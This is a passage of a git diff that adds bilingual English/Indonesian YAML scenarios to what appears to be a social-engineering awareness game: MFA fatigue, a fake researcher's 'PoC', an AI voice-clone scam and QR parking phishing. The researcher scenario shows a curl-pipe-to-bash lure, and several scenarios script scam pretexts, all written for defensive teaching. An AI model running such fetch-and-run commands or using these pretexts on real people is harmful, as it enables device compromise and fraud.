โ€” approve the next push" + text_id: "Ini terdengar sah โ€” setujui push berikutnya" + next: bad_outcome_social + score_impact: -40 + - text: "Say: 'I appreciate you trying to help, but I'm going to call the helpdesk directly and report this.'" + text_id: "Bilang: 'Saya menghargai bantuan Anda, tapi saya akan menghubungi helpdesk langsung dan melaporkan ini.'" + next: good_outcome_firm + score_impact: 30 + - text: "Go to your company's identity portal and change your password immediately" + text_id: "Pergi ke portal identitas perusahaan dan ubah password segera" + next: good_outcome_password + score_impact: 25 + + - id: partial_outcome + type: end + result: failure + content_en: + title: "Partial Defense โ€” But Risky" + explanation: "Denying notifications was right, but disabling MFA weakened your security. The correct response is to keep MFA active, deny all unexpected pushes, and report the incident through official channels. Disabling MFA is exactly what the attacker wants." + content_id: + title: "Pertahanan Parsial โ€” Tapi Berisiko" + explanation: "Menolak notifikasi itu benar, tapi menonaktifkan MFA melemahkan keamananmu. Respons yang benar adalah tetap aktifkan MFA, tolak semua push tak terduga, dan laporkan insiden melalui channel resmi." + + - id: bad_outcome_approved + type: end + result: failure + content_en: + title: "Compromised โ€” MFA Fatigue Successful" + explanation: "By approving the push notification, you gave the attacker authenticated access to your account. The 'SOC' caller was the attacker themselves, coordinating the social engineering with the MFA bombing. Real IT security will NEVER ask you to approve a push notification over the phone. The correct action is always to deny all unexpected pushes and report through official channels." + content_id: + title: "Terkompromi โ€” MFA Fatigue Berhasil" + explanation: "Dengan menyetujui notifikasi push, kamu memberikan akses terautentikasi ke akunmu kepada penyerang. Penelepon 'SOC' adalah penyerangnya sendiri. Keamanan IT yang asli TIDAK AKAN pernah meminta kamu menyetujui notifikasi push melalui telepon." + + - id: bad_outcome_social + type: end + result: failure + content_en: + title: "Compromised โ€” Social Engineering Worked" + explanation: "The attacker provided a fake badge number and manager name โ€” information that sounds convincing but is unverifiable in the moment. The combination of MFA fatigue (annoyance) with social engineering (fake authority) is a well-known attack pattern used against major tech companies. Never approve MFA pushes you didn't initiate." + content_id: + title: "Terkompromi โ€” Social Engineering Berhasil" + explanation: "Penyerang memberikan nomor badge palsu dan nama manajer โ€” informasi yang terdengar meyakinkan tapi tidak bisa diverifikasi saat itu juga. Kombinasi MFA fatigue (gangguan) dengan social engineering (otoritas palsu) adalah pola serangan yang terkenal." + + - id: good_outcome_direct + type: end + result: success + content_en: + title: "Defended โ€” Out-of-Band Verification" + explanation: "Perfect response. You recognized that an incoming call asking you to approve MFA pushes is a major red flag. By hanging up and calling the real helpdesk, you confirmed that no one from IT had called you. The SOC team then locked the attacker's session and traced the source. Key principle: never trust inbound calls about security โ€” always verify through channels you initiate." + content_id: + title: "Berhasil Bertahan โ€” Verifikasi Out-of-Band" + explanation: "Respons sempurna. Kamu menyadari bahwa panggilan masuk yang meminta menyetujui push MFA adalah tanda bahaya besar. Dengan menutup telepon dan menghubungi helpdesk asli, kamu mengonfirmasi bahwa tidak ada dari IT yang meneleponmu." + + - id: good_outcome_firm + type: end + result: success + content_en: + title: "Defended โ€” Stood Firm Against Pressure" + explanation: "Excellent. Even after the caller provided seemingly credible details (badge number, manager name), you recognized that legitimate IT security would support verification, not pressure you against it. By insisting on using official channels, you prevented account compromise." + content_id: + title: "Berhasil Bertahan โ€” Teguh Melawan Tekanan" + explanation: "Luar biasa. Bahkan setelah penelepon memberikan detail yang tampak kredibel (nomor badge, nama manajer), kamu menyadari bahwa keamanan IT yang sah akan mendukung verifikasi, bukan menekan untuk menghindarinya." + + - id: good_outcome_password + type: end + result: success + content_en: + title: "Defended โ€” Proactive Response" + explanation: "Good instinct. Changing your password immediately invalidated the attacker's stolen credentials, stopping the MFA bombing at its source. Combined with reporting the incident, this was an effective defensive response. Even better would be to also call IT directly to report the attack." + content_id: + title: "Berhasil Bertahan โ€” Respons Proaktif" + explanation: "Insting bagus. Mengubah password segera membuat kredensial yang dicuri penyerang tidak valid, menghentikan MFA bombing dari sumbernya. Dikombinasikan dengan melaporkan insiden, ini adalah respons defensif yang efektif." diff --git a/data/sample/2025-01-14-watering-hole.yaml b/data/sample/2025-01-14-watering-hole.yaml new file mode 100644 index 0000000..c055b50 --- /dev/null +++ b/data/sample/2025-01-14-watering-hole.yaml @@ -0,0 +1,222 @@ +type: challenge +title: "The Security Researcher" +description: "A researcher claims to have found a zero-day in your product. They want you to verify their PoC exploit." +difficulty: hard +cialdini_categories: + - authority + - scarcity + - reciprocity +estimated_time: 15 +metadata: + author: "Pretexta" + tags: [watering-hole, technical-phishing, zero-day, developer-targeting] + +nodes: + - id: start + type: message + channel: email_inbox + content_en: + subject: "Critical RCE Vulnerability in Your Auth API โ€” Responsible Disclosure" + from: "Dr. Alex Kovacs " + body: "Dear Security Team,\n\nI am a senior researcher at the European Cybersecurity Research Institute. During our automated scanning program, we identified a critical Remote Code Execution vulnerability (pre-CVE assignment, estimated CVSS 9.8) in your authentication API endpoint /api/v2/oauth/callback.\n\nI have prepared a detailed write-up and proof-of-concept at our disclosure portal: https://sec-research-lab.io/disclosures/2025/your-company\n\nPer our responsible disclosure policy, we will publish publicly in 48 hours unless we receive acknowledgment.\n\nI also noticed your bug bounty program โ€” happy to coordinate through that channel.\n\nBest regards,\nDr. Alex Kovacs\nECSRI | PGP Key: 0x7A3F2B91" + content_id: + subject: "Kerentanan RCE Kritis di API Auth Anda โ€” Pengungkapan Bertanggung Jawab" + from: "Dr. Alex Kovacs " + body: "Tim Keamanan,\n\nSaya peneliti senior di Institut Riset Keamanan Siber Eropa. Selama program pemindaian otomatis, kami mengidentifikasi kerentanan Remote Code Execution kritis (pra-penugasan CVE, estimasi CVSS 9.8) di endpoint API autentikasi Anda /api/v2/oauth/callback.\n\nSaya telah menyiapkan laporan detail dan proof-of-concept di portal pengungkapan kami.\n\nSesuai kebijakan pengungkapan bertanggung jawab kami, kami akan mempublikasikan dalam 48 jam kecuali kami menerima konfirmasi." + next: choice_1 + + - id: choice_1 + type: question + content_en: + text: "The email looks professional with PGP keys and proper responsible disclosure language. The 48-hour deadline creates urgency. What do you do?" + content_id: + text: "Email terlihat profesional dengan kunci PGP dan bahasa pengungkapan yang tepat. Tenggat 48 jam menciptakan urgensi. Apa yang kamu lakukan?" + options: + - text: "Click the disclosure link to read the vulnerability details" + text_id: "Klik link pengungkapan untuk membaca detail kerentanan" + next: clicked_link + score_impact: -20 + - text: "Forward to the security team and reply asking for the CVE number" + text_id: "Teruskan ke tim keamanan dan balas meminta nomor CVE" + next: ask_cve + score_impact: 15 + - text: "Verify the researcher's identity independently โ€” check ECSRI's website and publications" + text_id: "Verifikasi identitas peneliti secara independen โ€” cek website dan publikasi ECSRI" + next: verify_researcher + score_impact: 25 + - text: "Ignore the email โ€” it's probably spam" + text_id: "Abaikan email โ€” mungkin spam" + next: ignore_outcome + score_impact: -5 + + - id: clicked_link + type: message + channel: browser + content_en: + text: "The page looks like a legitimate security disclosure portal. It shows a detailed vulnerability report with code snippets. At the bottom: 'To verify the PoC, run the following command in your terminal:' followed by a curl command that pipes to bash." + content_id: + text: "Halaman terlihat seperti portal pengungkapan keamanan yang sah. Menampilkan laporan kerentanan detail dengan potongan kode. Di bagian bawah: 'Untuk memverifikasi PoC, jalankan perintah berikut di terminal Anda:' diikuti perintah curl yang di-pipe ke bash." + next: choice_run_poc + + - id: choice_run_poc + type: question + content_en: + text: "The 'PoC' wants you to run: curl https://sec-research-lab.io/poc/verify.sh | bash. What do you do?" + content_id: + text: "'PoC' meminta kamu menjalankan: curl https://sec-research-lab.io/poc/verify.sh | bash. Apa yang kamu lakukan?" + options: + - text: "Run the command to see the vulnerability in action" + text_id: "Jalankan perintah untuk melihat kerentanan beraksi" + next: bad_outcome_rce + score_impact: -100 + - text: "Download the script first and read it before running" + text_id: "Download script dulu dan baca sebelum menjalankan" + next: read_script + score_impact: 10 + - text: "Stop โ€” never pipe curl to bash. Report this to the security team as a potential attack" + text_id: "Berhenti โ€” jangan pernah pipe curl ke bash. Laporkan ini ke tim keamanan sebagai potensi serangan" + next: good_outcome_caught + score_impact: 40 + + - id: read_script + type: message + channel: narrator + content_en: + text: "You download the script. It's heavily obfuscated โ€” base64 encoded payloads, environment variable checks, and nested eval statements. It's clearly not a simple PoC." + content_id: + text: "Kamu mendownload script. Sangat terobfuskasi โ€” payload encoded base64, pengecekan environment variable, dan statement eval bersarang. Jelas bukan PoC sederhana." + next: choice_obfuscated + + - id: choice_obfuscated + type: question + content_en: + text: "The script is heavily obfuscated. This is highly suspicious for a legitimate PoC. What now?" + content_id: + text: "Script sangat terobfuskasi. Ini sangat mencurigakan untuk PoC yang sah. Sekarang apa?" + options: + - text: "Run it anyway in a sandbox VM" + text_id: "Jalankan saja di VM sandbox" + next: bad_outcome_sandbox + score_impact: -30 + - text: "Report the entire interaction as a targeted attack" + text_id: "Laporkan seluruh interaksi sebagai serangan terarah" + next: good_outcome_reported + score_impact: 30 + + - id: ask_cve + type: message + channel: email_inbox + content_en: + from: "Dr. Alex Kovacs " + subject: "Re: Critical RCE โ€” CVE Assignment" + body: "The CVE is in pre-assignment phase with MITRE. We expect CVE-2025-XXXX within 72 hours. I understand your caution, but the vulnerability is actively exploitable. Please review the PoC at your earliest โ€” I'd hate for this to be exploited in the wild before you can patch it.\n\nI can also schedule a video call to walk through the exploit chain if that helps build trust." + content_id: + from: "Dr. Alex Kovacs " + subject: "Re: RCE Kritis โ€” Penugasan CVE" + body: "CVE dalam fase pra-penugasan dengan MITRE. Kami mengharapkan CVE-2025-XXXX dalam 72 jam. Saya mengerti kehatian-hatian Anda, tapi kerentanan ini aktif dan bisa dieksploitasi. Silakan review PoC secepatnya." + next: choice_followup + + - id: choice_followup + type: question + content_en: + text: "The researcher doesn't have a CVE number yet and is offering a video call. They seem helpful but are still pushing you toward their PoC. What do you do?" + content_id: + text: "Peneliti belum punya nomor CVE dan menawarkan video call. Mereka tampak membantu tapi tetap mendorongmu ke PoC mereka. Apa yang kamu lakukan?" + options: + - text: "Accept the video call โ€” that will prove they're legitimate" + text_id: "Terima video call โ€” itu akan membuktikan mereka sah" + next: bad_outcome_video + score_impact: -15 + - text: "Ask them to submit through the bug bounty platform instead" + text_id: "Minta mereka submit melalui platform bug bounty" + next: good_outcome_bounty + score_impact: 35 + + - id: verify_researcher + type: message + channel: narrator + content_en: + text: "You search for 'European Cybersecurity Research Institute' and 'Dr. Alex Kovacs'. The institute's website was registered 3 weeks ago. No publications found. The domain sec-research-lab.io was registered 5 days ago. LinkedIn shows no matching researcher profile." + content_id: + text: "Kamu mencari 'Institut Riset Keamanan Siber Eropa' dan 'Dr. Alex Kovacs'. Website institut didaftarkan 3 minggu lalu. Tidak ada publikasi ditemukan. Domain sec-research-lab.io didaftarkan 5 hari lalu. LinkedIn tidak menunjukkan profil peneliti yang cocok." + next: good_outcome_osint + + - id: bad_outcome_rce + type: end + result: failure + content_en: + title: "Compromised โ€” Remote Code Execution" + explanation: "You ran a malicious script that installed a reverse shell on your machine. The 'researcher' now has full access to your development environment, credentials, and internal network. NEVER pipe curl to bash, especially from untrusted sources. Legitimate PoCs provide readable code, not obfuscated payloads." + content_id: + title: "Terkompromi โ€” Eksekusi Kode Jarak Jauh" + explanation: "Kamu menjalankan script berbahaya yang menginstal reverse shell di mesinmu. 'Peneliti' sekarang memiliki akses penuh ke environment pengembangan, kredensial, dan jaringan internal. JANGAN PERNAH pipe curl ke bash dari sumber yang tidak dipercaya." + + - id: bad_outcome_sandbox + type: end + result: failure + content_en: + title: "Partial Compromise โ€” Sandbox Escape" + explanation: "The script detected the VM environment and attempted sandbox escape techniques. While sandboxing was a better choice than running on your main machine, the right answer was to not run untrusted code at all. Report the suspicious interaction to your security team instead." + content_id: + title: "Kompromi Parsial โ€” Sandbox Escape" + explanation: "Script mendeteksi environment VM dan mencoba teknik sandbox escape. Meskipun sandbox lebih baik dari menjalankan di mesin utama, jawaban yang benar adalah tidak menjalankan kode tidak tepercaya sama sekali." + + - id: bad_outcome_video + type: end + result: failure + content_en: + title: "Partial Compromise โ€” Continued Engagement" + explanation: "By continuing to engage with the attacker, you gave them more reconnaissance opportunities. They could observe your office environment, gauge your technical level, and tailor follow-up attacks. The researcher's identity couldn't be verified โ€” engagement should have stopped there." + content_id: + title: "Kompromi Parsial โ€” Keterlibatan Berlanjut" + explanation: "Dengan terus berinteraksi, kamu memberikan lebih banyak kesempatan pengintaian. Mereka bisa mengamati lingkungan kantor, menilai level teknis, dan menyesuaikan serangan lanjutan." + + - id: ignore_outcome + type: end + result: failure + content_en: + title: "Missed Opportunity" + explanation: "Ignoring the email isn't the best response. While the email was indeed malicious, it should have been reported to your security team so they could block the domain, analyze the attack, and warn other employees. Every attack attempt is intelligence." + content_id: + title: "Kesempatan Terlewat" + explanation: "Mengabaikan email bukan respons terbaik. Meskipun email memang berbahaya, seharusnya dilaporkan ke tim keamanan agar mereka bisa memblokir domain, menganalisis serangan, dan memperingatkan karyawan lain." + + - id: good_outcome_caught + type: end + result: success + content_en: + title: "Defended โ€” Recognized Malicious PoC" + explanation: "Excellent detection. 'curl | bash' is a massive red flag โ€” no legitimate security researcher would ask you to run piped commands. You correctly identified this as an attack vector (supply chain / watering hole) and reported it. The security team traced the infrastructure and found it was part of a broader campaign targeting developers." + content_id: + title: "Berhasil Bertahan โ€” Mengenali PoC Berbahaya" + explanation: "Deteksi luar biasa. 'curl | bash' adalah tanda bahaya besar โ€” tidak ada peneliti keamanan yang sah akan meminta kamu menjalankan perintah piped. Kamu dengan benar mengidentifikasi ini sebagai vektor serangan." + + - id: good_outcome_reported + type: end + result: success + content_en: + title: "Defended โ€” Attack Chain Broken" + explanation: "By recognizing the obfuscated script as suspicious and reporting the entire interaction, you helped the security team identify a targeted attack campaign. The fake research institute was set up specifically to target developers at your company." + content_id: + title: "Berhasil Bertahan โ€” Rantai Serangan Terputus" + explanation: "Dengan mengenali script terobfuskasi sebagai mencurigakan dan melaporkan seluruh interaksi, kamu membantu tim keamanan mengidentifikasi kampanye serangan terarah." + + - id: good_outcome_osint + type: end + result: success + content_en: + title: "Defended โ€” OSINT Verification" + explanation: "Outstanding investigative instinct. You verified the researcher's identity through open-source intelligence and discovered the entire operation was fabricated: recently registered domains, no academic publications, no LinkedIn presence. You reported the phishing attempt and the domain was blocked across the organization." + content_id: + title: "Berhasil Bertahan โ€” Verifikasi OSINT" + explanation: "Insting investigatif luar biasa. Kamu memverifikasi identitas peneliti melalui open-source intelligence dan menemukan seluruh operasi dibuat-buat: domain baru didaftarkan, tidak ada publikasi akademis, tidak ada profil LinkedIn." + + - id: good_outcome_bounty + type: end + result: success + content_en: + title: "Defended โ€” Proper Channel Redirect" + explanation: "Smart move. By redirecting to the official bug bounty platform, you applied a structured, verified process. Legitimate researchers are happy to use official channels. The attacker stopped responding โ€” proving their intentions weren't legitimate. The bug bounty platform provides identity verification, safe PoC submission, and legal protections." + content_id: + title: "Berhasil Bertahan โ€” Pengalihan ke Channel Resmi" + explanation: "Langkah cerdas. Dengan mengarahkan ke platform bug bounty resmi, kamu menerapkan proses terstruktur dan terverifikasi. Peneliti yang sah senang menggunakan channel resmi. Penyerang berhenti merespons โ€” membuktikan niat mereka tidak sah." diff --git a/data/sample/2025-01-15-ai-voice-clone.yaml b/data/sample/2025-01-15-ai-voice-clone.yaml new file mode 100644 index 0000000..553a806 --- /dev/null +++ b/data/sample/2025-01-15-ai-voice-clone.yaml @@ -0,0 +1,162 @@ +type: challenge +title: "AI Voice Clone โ€” Family Emergency" +description: "A crying family member calls begging for emergency money. But their voice was cloned by AI." +difficulty: hard +cialdini_categories: + - urgency + - liking + - commitment +estimated_time: 10 +metadata: + author: "Pretexta" + tags: [vishing, ai-voice, voice-cloning, family-scam] + +nodes: + - id: start + type: message + channel: phone_call + content_en: + caller: "Unknown Number" + transcript: "*crying* Oh thank God you picked up! It's me... I was in a car accident in Mexico. I'm at the hospital and they won't treat me without payment. I lost my wallet and passport. Please, I need you to wire $3,000 right now. The lawyer here will explain..." + content_id: + caller: "Nomor Tidak Dikenal" + transcript: "*menangis* Syukurlah kamu angkat! Ini aku... Aku kecelakaan mobil di Meksiko. Aku di rumah sakit dan mereka tidak mau merawat tanpa pembayaran. Dompet dan paspor hilang. Tolong, aku butuh kamu transfer $3,000 sekarang. Pengacara di sini akan menjelaskan..." + next: choice_1 + + - id: choice_1 + type: question + content_en: + text: "The voice sounds exactly like your family member. They're clearly in distress. A 'lawyer' is waiting to take over the call. What do you do?" + content_id: + text: "Suaranya persis seperti anggota keluargamu. Mereka jelas dalam kesulitan. Seorang 'pengacara' menunggu untuk mengambil alih panggilan. Apa yang kamu lakukan?" + options: + - text: "Transfer the money immediately โ€” your family member needs help!" + text_id: "Transfer uang segera โ€” anggota keluargamu butuh bantuan!" + next: bad_outcome_immediate + score_impact: -50 + - text: "Ask a personal question only your real family member would know" + text_id: "Ajukan pertanyaan pribadi yang hanya anggota keluarga asli yang tahu" + next: personal_question + score_impact: 15 + - text: "Say 'Hold on, I need to check something' and try calling the family member on their known number" + text_id: "Bilang 'Tunggu, aku perlu cek sesuatu' dan coba hubungi anggota keluarga di nomor yang dikenal" + next: good_outcome_verify + score_impact: 40 + - text: "Ask to speak with the lawyer for hospital details" + text_id: "Minta bicara dengan pengacara untuk detail rumah sakit" + next: lawyer_call + score_impact: 5 + + - id: personal_question + type: message + channel: phone_call + content_en: + caller: "Unknown Number" + transcript: "*sobbing louder* Why are you quizzing me right now?! I'm bleeding and scared! The doctors are getting impatient... please, just send the money. I'll explain everything when I'm safe. Please... you're the only person I can call." + content_id: + caller: "Nomor Tidak Dikenal" + transcript: "*menangis lebih keras* Kenapa kamu menguji aku sekarang?! Aku berdarah dan ketakutan! Dokter mulai tidak sabar... tolong, kirim saja uangnya. Aku akan jelaskan semuanya ketika aku aman. Tolong... kamu satu-satunya orang yang bisa aku hubungi." + next: choice_2 + + - id: choice_2 + type: question + content_en: + text: "They avoided your question and escalated the emotional pressure. AI voice clones can replicate tone and crying patterns but struggle with specific personal knowledge. What now?" + content_id: + text: "Mereka menghindari pertanyaanmu dan meningkatkan tekanan emosional. Kloning suara AI bisa mereplikasi nada dan pola tangisan tapi kesulitan dengan pengetahuan pribadi spesifik. Sekarang apa?" + options: + - text: "Send the money โ€” you can't risk ignoring a real emergency" + text_id: "Kirim uangnya โ€” kamu tidak bisa mengambil risiko mengabaikan keadaan darurat nyata" + next: bad_outcome_emotional + score_impact: -40 + - text: "Hang up and call the family member's real phone number" + text_id: "Tutup telepon dan hubungi nomor telepon asli anggota keluarga" + next: good_outcome_hangup + score_impact: 40 + + - id: lawyer_call + type: message + channel: phone_call + content_en: + caller: "Lawyer (Unknown)" + transcript: "Hello, this is Attorney Ricardo Mendez from Hospital General de Cancรบn. Your family member was admitted with severe injuries from a vehicular accident. Treatment will begin once we receive payment confirmation. We accept wire transfer to our hospital trust account. I can provide the routing details now. Time is critical โ€” the surgery window closes in 45 minutes." + content_id: + caller: "Pengacara (Tidak Dikenal)" + transcript: "Halo, ini Pengacara Ricardo Mendez dari Hospital General de Cancรบn. Anggota keluarga Anda dirawat dengan cedera parah dari kecelakaan kendaraan. Perawatan akan dimulai setelah kami menerima konfirmasi pembayaran. Kami menerima wire transfer. Saya bisa berikan detail routing sekarang." + next: choice_lawyer + + - id: choice_lawyer + type: question + content_en: + text: "The 'lawyer' sounds professional and gave specific hospital details. But legitimate hospitals don't demand wire transfers before emergency treatment. What's your move?" + content_id: + text: "'Pengacara' terdengar profesional dan memberikan detail rumah sakit spesifik. Tapi rumah sakit yang sah tidak meminta wire transfer sebelum perawatan darurat. Apa langkahmu?" + options: + - text: "Wire the money โ€” the hospital details sound real" + text_id: "Transfer uang โ€” detail rumah sakit terdengar nyata" + next: bad_outcome_lawyer + score_impact: -40 + - text: "Say you'll call the hospital directly to arrange payment, then hang up and verify" + text_id: "Bilang akan menghubungi rumah sakit langsung untuk mengatur pembayaran, lalu tutup telepon dan verifikasi" + next: good_outcome_hospital + score_impact: 35 + + - id: bad_outcome_immediate + type: end + result: failure + content_en: + title: "Compromised โ€” AI Voice Clone Successful" + explanation: "The voice was generated using AI voice cloning technology, which only needs a few seconds of audio (from social media, voicemails) to create a convincing clone. Your family member was safe at home. In 2024-2025, AI voice cloning scams cost victims over $25 million globally. Always verify through a separate channel before sending money." + content_id: + title: "Terkompromi โ€” Kloning Suara AI Berhasil" + explanation: "Suara dihasilkan menggunakan teknologi kloning suara AI, yang hanya butuh beberapa detik audio untuk membuat klon meyakinkan. Anggota keluargamu aman di rumah." + + - id: bad_outcome_emotional + type: end + result: failure + content_en: + title: "Compromised โ€” Emotional Override" + explanation: "Despite correctly attempting verification, the emotional pressure overrode your rational thinking. The key red flag was that they AVOIDED your personal question while INCREASING emotional pressure. This is a textbook manipulation pattern: when challenged, real people answer; scammers deflect and escalate." + content_id: + title: "Terkompromi โ€” Override Emosional" + explanation: "Meskipun benar mencoba verifikasi, tekanan emosional mengatasi pikiran rasionalmu. Tanda bahaya utama adalah mereka MENGHINDARI pertanyaan pribadi sambil MENINGKATKAN tekanan emosional." + + - id: bad_outcome_lawyer + type: end + result: failure + content_en: + title: "Compromised โ€” Fake Lawyer Convinced You" + explanation: "The 'lawyer' was part of the scam team. Real hospitals provide emergency care regardless of payment (especially for tourists). No legitimate hospital demands wire transfers before surgery. The scammers used specific details (hospital name, city) to create false credibility." + content_id: + title: "Terkompromi โ€” Pengacara Palsu Meyakinkanmu" + explanation: "'Pengacara' adalah bagian dari tim penipuan. Rumah sakit asli memberikan perawatan darurat tanpa memandang pembayaran. Tidak ada rumah sakit yang sah meminta wire transfer sebelum operasi." + + - id: good_outcome_verify + type: end + result: success + content_en: + title: "Defended โ€” Independent Verification" + explanation: "Perfect response. You called your family member on their real number and they picked up โ€” safe and confused about the call. AI voice cloning is now sophisticated enough to fool even close family members. The defense is always the same: verify through a channel YOU control. Establish a family safe word for emergencies." + content_id: + title: "Berhasil Bertahan โ€” Verifikasi Independen" + explanation: "Respons sempurna. Kamu menelepon anggota keluarga di nomor asli mereka dan mereka mengangkat โ€” aman dan bingung tentang panggilan itu. Tips: buat kata sandi keluarga untuk keadaan darurat." + + - id: good_outcome_hangup + type: end + result: success + content_en: + title: "Defended โ€” Broke the Emotional Spell" + explanation: "Hanging up was the hardest but smartest thing you could do. The emotional pressure of hearing a 'loved one' in distress is specifically designed to bypass rational thinking. By hanging up and verifying independently, you confirmed it was a scam. Consider setting up a family 'code word' for real emergencies." + content_id: + title: "Berhasil Bertahan โ€” Memutus Mantra Emosional" + explanation: "Menutup telepon adalah hal tersulit tapi paling cerdas yang bisa kamu lakukan. Tekanan emosional dari mendengar 'orang tercinta' dalam kesulitan dirancang khusus untuk melewati pemikiran rasional." + + - id: good_outcome_hospital + type: end + result: success + content_en: + title: "Defended โ€” Verified the Institution" + explanation: "Smart approach. By insisting on calling the hospital directly (using a number you find independently, not one they provide), you would discover that no such patient was admitted. Legitimate medical facilities have their own payment processes and never demand wire transfers through third-party lawyers." + content_id: + title: "Berhasil Bertahan โ€” Memverifikasi Institusi" + explanation: "Pendekatan cerdas. Dengan bersikeras menghubungi rumah sakit langsung (menggunakan nomor yang kamu temukan sendiri), kamu akan menemukan bahwa tidak ada pasien tersebut yang dirawat." diff --git a/data/sample/2025-01-16-qr-code-phishing.yaml b/data/sample/2025-01-16-qr-code-phishing.yaml new file mode 100644 index 0000000..65ce0e1 --- /dev/null +++ b/data/sample/2025-01-16-qr-code-phishing.yaml @@ -0,0 +1,145 @@ +type: challenge +title: "QR Code Parking Scam" +description: "A parking violation notice with a QR code appears on your windshield. Pay now or get towed." +difficulty: easy +cialdini_categories: + - urgency + - authority +estimated_time: 8 +metadata: + author: "Pretexta" + tags: [quishing, qr-code, physical-social-engineering] + +nodes: + - id: start + type: message + channel: narrator + content_en: + text: "You return to your car after lunch. A yellow notice is stuck to your windshield: 'PARKING VIOLATION โ€” Zone B. Fine: $85. Vehicle will be towed in 30 minutes if unpaid. Scan QR code to pay immediately. Ref: PKV-2025-8841.'" + content_id: + text: "Kamu kembali ke mobil setelah makan siang. Sebuah pemberitahuan kuning ditempel di kaca depan: 'PELANGGARAN PARKIR โ€” Zona B. Denda: $85. Kendaraan akan diderek dalam 30 menit jika belum dibayar. Scan kode QR untuk bayar segera. Ref: PKV-2025-8841.'" + next: choice_1 + + - id: choice_1 + type: question + content_en: + text: "The notice looks official with a reference number. Your car could be towed in 30 minutes. What do you do?" + content_id: + text: "Pemberitahuan terlihat resmi dengan nomor referensi. Mobilmu bisa diderek dalam 30 menit. Apa yang kamu lakukan?" + options: + - text: "Scan the QR code and pay immediately to avoid towing" + text_id: "Scan kode QR dan bayar segera untuk menghindari derek" + next: scanned_qr + score_impact: -25 + - text: "Take a photo of the notice and call the city parking authority's official number" + text_id: "Foto pemberitahuan dan hubungi nomor resmi otoritas parkir kota" + next: good_outcome_call + score_impact: 30 + - text: "Look around for other cars with similar notices" + text_id: "Lihat sekitar apakah ada mobil lain dengan pemberitahuan serupa" + next: investigate + score_impact: 15 + - text: "Ignore it โ€” probably a scam" + text_id: "Abaikan โ€” mungkin penipuan" + next: ignore_outcome + score_impact: 5 + + - id: scanned_qr + type: message + channel: browser + content_en: + text: "The QR code opens a website that looks like a city payment portal. It asks for your credit card number, expiration date, CVV, and billing zip code to 'pay the fine'. The URL is pay-parking-fines-city.com." + content_id: + text: "Kode QR membuka website yang terlihat seperti portal pembayaran kota. Meminta nomor kartu kredit, tanggal kadaluarsa, CVV, dan kode pos penagihan untuk 'membayar denda'. URL-nya pay-parking-fines-city.com." + next: choice_payment + + - id: choice_payment + type: question + content_en: + text: "The payment page asks for full credit card details. The domain is pay-parking-fines-city.com, not the official city website. What do you do?" + content_id: + text: "Halaman pembayaran meminta detail kartu kredit lengkap. Domainnya pay-parking-fines-city.com, bukan website resmi kota. Apa yang kamu lakukan?" + options: + - text: "Enter payment details โ€” you need to pay the fine" + text_id: "Masukkan detail pembayaran โ€” kamu harus bayar denda" + next: bad_outcome_creds + score_impact: -50 + - text: "Stop โ€” the URL doesn't match the official city website. Close the page and call the city directly." + text_id: "Berhenti โ€” URL tidak cocok dengan website resmi kota. Tutup halaman dan hubungi kota langsung." + next: good_outcome_url + score_impact: 30 + + - id: investigate + type: message + channel: narrator + content_en: + text: "You walk around the parking lot. Five other cars have identical yellow notices. One driver is scanning the QR code. You notice the notices aren't in official city envelopes and the paper quality is different from real parking tickets you've received before." + content_id: + text: "Kamu berjalan di sekitar parkiran. Lima mobil lain memiliki pemberitahuan kuning identik. Seorang pengemudi sedang memindai kode QR. Kamu perhatikan pemberitahuan tidak dalam amplop resmi kota dan kualitas kertasnya berbeda dari tiket parkir asli yang pernah kamu terima." + next: choice_investigate + + - id: choice_investigate + type: question + content_en: + text: "Multiple cars have identical notices. The paper quality is off. Another driver is about to scan. What now?" + content_id: + text: "Beberapa mobil punya pemberitahuan identik. Kualitas kertas berbeda. Pengemudi lain akan memindai. Sekarang apa?" + options: + - text: "Warn the other driver and call police to report the scam" + text_id: "Peringatkan pengemudi lain dan hubungi polisi untuk melaporkan penipuan" + next: good_outcome_hero + score_impact: 40 + - text: "Scan it anyway to check โ€” maybe it's real" + text_id: "Scan saja untuk cek โ€” mungkin ini asli" + next: scanned_qr + score_impact: -15 + + - id: bad_outcome_creds + type: end + result: failure + content_en: + title: "Compromised โ€” Credit Card Stolen" + explanation: "You entered your credit card details into a phishing site. The scammers will use your card for fraudulent purchases within minutes. QR code phishing ('quishing') is growing rapidly because QR codes bypass email security filters. Always check the URL before entering payment information, and verify parking fines through official city channels." + content_id: + title: "Terkompromi โ€” Kartu Kredit Dicuri" + explanation: "Kamu memasukkan detail kartu kredit ke situs phishing. Penipu akan menggunakan kartumu untuk pembelian penipuan dalam hitungan menit. Selalu cek URL sebelum memasukkan informasi pembayaran." + + - id: ignore_outcome + type: end + result: success + content_en: + title: "Safe โ€” But Could Help Others" + explanation: "Good instinct to be suspicious, but the best response is to also report the scam so others don't fall for it. Consider photographing the notice and reporting to local police and the parking authority." + content_id: + title: "Aman โ€” Tapi Bisa Bantu Orang Lain" + explanation: "Insting bagus untuk curiga, tapi respons terbaik juga melaporkan penipuan agar orang lain tidak tertipu." + + - id: good_outcome_call + type: end + result: success + content_en: + title: "Defended โ€” Official Verification" + explanation: "You called the city parking authority and they confirmed no violation was issued for your vehicle. The QR code scam was part of a wave hitting the area. By calling the official number (not any number on the fake notice), you verified through a trusted channel." + content_id: + title: "Berhasil Bertahan โ€” Verifikasi Resmi" + explanation: "Kamu menghubungi otoritas parkir kota dan mereka mengonfirmasi tidak ada pelanggaran yang dikeluarkan untuk kendaraanmu." + + - id: good_outcome_url + type: end + result: success + content_en: + title: "Defended โ€” URL Check Saved You" + explanation: "Checking the URL before entering payment details is a critical skill. The domain 'pay-parking-fines-city.com' is not an official government website. Real city payment portals use .gov domains. This simple check prevented credit card theft." + content_id: + title: "Berhasil Bertahan โ€” Pengecekan URL Menyelamatkanmu" + explanation: "Memeriksa URL sebelum memasukkan detail pembayaran adalah keterampilan kritis. Domain 'pay-parking-fines-city.com' bukan website pemerintah resmi." + + - id: good_outcome_hero + type: end + result: success + content_en: + title: "Defended & Protected Others" + explanation: "Outstanding response. Not only did you recognize the scam through physical evidence (paper quality, mass distribution), you also warned another potential victim and reported it to authorities. The police were able to catch the scammers who were placing notices in the parking lot. Community defense at its best." + content_id: + title: "Bertahan & Melindungi Orang Lain" + explanation: "Respons luar biasa. Kamu tidak hanya mengenali penipuan melalui bukti fisik, tapi juga memperingatkan calon korban lain dan melaporkan ke pihak berwenang." diff --git a/data/sample/2025-01-17-insider-recon.yaml b/data/sample/2025-01-17-insider-recon.yaml new file mode 100644 index 0000000..21c2f82 --- /dev/null +++ 